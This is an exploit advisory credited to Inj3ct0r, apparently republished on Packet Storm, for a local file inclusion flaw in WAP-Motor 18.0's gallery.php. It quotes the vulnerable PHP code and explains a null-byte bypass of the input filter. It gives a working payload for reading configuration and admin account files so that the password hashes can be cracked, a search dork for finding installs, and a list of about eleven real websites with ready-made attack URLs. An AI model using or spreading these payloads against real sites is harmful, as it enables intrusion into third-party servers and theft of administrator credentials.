WAP-Motor version 18.0 suffers from a local file inclusion vulnerability in gallery.php.
52dc05c551d9bc725e7e5165c5f31f4beab66f483da4445d018f8feafc9a5bb7===============================================================
Wap-motor <= v. 18.0 (gallery.php) File Inclusion Vulnerability
===============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
Product : Wap-motor
Vesrion : v 18.0
dork: "Powered by Wap-motor"
site: http://visavi.net
download: http://visavi.net/download/down.php?action=ob&did=wap-motor16&fid=MOTOR18.zip&
In this version of vulnerability photo gallery script.
Namely file
http://[PATH]/gallery/gallery.php
Let's code!
PHP code:
<?php
require_once"../template/start.php";
require_once"../template/regglobals.php";
require_once"../template/config.php";
require_once"../template/functions.php";
$image=check($image);
$ext = strtolower(substr($image, strrpos($image, '.') + 1));
if($ext=="jpg" || $ext=="gif" || $ext=="png"){
if($ext=="jpg"){$ext="jpeg";}
$filename = BASEDIR."local/datagallery/$image";
$filename = file_get_contents($filename);
header('Content-Disposition: inline; filename="'.$image.'"');
header("Content-type: image/$ext");
header("Content-Length: ".strlen($filename));
echo $filename;
}
?>
file : ./template/regglobals.php
...
if (!ini_get('register_globals')) {
while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value;
while(list($key,$value)=each($_SESSION)) $GLOBALS[$key]=$value;
}
...
foreach ($_GET as $check_url) {
if ((eregi("<[^>]*script*\"?[^>]*>", $check_url)) || (eregi("<[^>]*object*\"?[^>]*>", $check_url)) ||
(eregi("<[^>]*iframe*\"?[^>]*>", $check_url)) || (eregi("<[^>]*applet*\"?[^>]*>", $check_url)) ||
(eregi("<[^>]*meta*\"?[^>]*>", $check_url)) || (eregi("<[^>]*style*\"?[^>]*>", $check_url)) ||
(eregi("<[^>]*form*\"?[^>]*>", $check_url)) || (eregi("\([^>]*\"?[^)]*\)", $check_url)) ||
(eregi("\"", $check_url)) || (eregi("\'", $check_url)) || (eregi("\./", $check_url)) ||
(eregi("//", $check_url)) || (eregi("<", $check_url)) || (eregi(">", $check_url))) {
header ("Location: ".BASEDIR."index.php?isset=403&".SID); exit;
}
...
Here, the picture has become clearer to see the algorithm!
Algorithm for action script when processing $ _GET [ 'image']:
1. while (list ($ key, $ value) = each ($ _GET)) $ GLOBALS [$ key] = $ value;
2. foreach ($ _GET as $ check_url) ...
3. $ ext = strtolower (substr ($ image, strrpos ($ image, '.') + 1));
4. header ( 'Content-Disposition: inline; filename ="'.$ image .'"');
header ( "Content-type: image / $ ext");
header ( "Content-Length:". strlen ($ filename));
echo $ filename;
That's what we have:
http://[PATH]/gallery/gallery.php?image=%00../profil/Twost.prof%00.gif
Consider,
image =% 00 - so we Nulle-byte stop processing eregi (). (Thanks for the article Elekt'u fatal mistake Php. Part Two.)
.. / profil / Twost.prof% 00 - inkludim profile file (do not forget to change the admin username to Twost) and trims the same Nulle-byte extension
. gif - but it substitute for the true value goes here
header ( "Content-type: image / $ ext");
The picture we have of course not appear, but it is not empty! Open the text editor and see the base of the account admin, you only have to decipher the hash!
That's it!
Example:
http://mobile-world.dbhost.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://margarita.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://sat-tv.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://kod.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://fuckyou.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://bazooka.pp.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://metra.h2m.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://chermo.net.ru/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif
http://sefan.us/gallery/gallery.php?image=%00../datatmp/adminlist.dat%00.gif
http://landark.net.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
http://vseicq.org.ru/gallery/gallery.php?image=%00../../template/config.php%00.gif
ThE End =] Visit my proj3ct :
http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net
# ~ - [ [ : Inj3ct0r : ] ]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed